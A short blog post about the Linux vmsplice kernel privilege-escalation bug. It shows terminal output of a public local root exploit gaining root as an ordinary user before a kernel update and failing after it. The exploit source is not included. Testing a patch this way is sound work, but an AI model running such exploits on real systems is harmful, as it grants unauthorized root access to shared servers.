Major Linux security hole found and fixed.
I just found out that there was a major Linux security hole after trying to figure out what the Linux kernel patch on the automatic update was for. After researching online, I found this:
The bug's effect is, in those versions of Linux using these kernels with this system call compiled in, to enable ordinary users with shell access to obtain root, superuser privileges. The security hole has been demonstrated in Debian, Fedora and Ubuntu.
Tracked down the exploit code and test it before the system update.
$ gcc exploit.c -o exploit
$ whoami
testuser
$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
# whoami
root
And after the update
$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d61000 .. 0xb7d93000
[-] vmsplice: Bad address
$
Since I'm the only user on this computer and I don't install any program, the exploit wasn't big concern. However this could be a big problem on my previous work where there are multiple servers with thousands of shell users.
No comments:
Post a Comment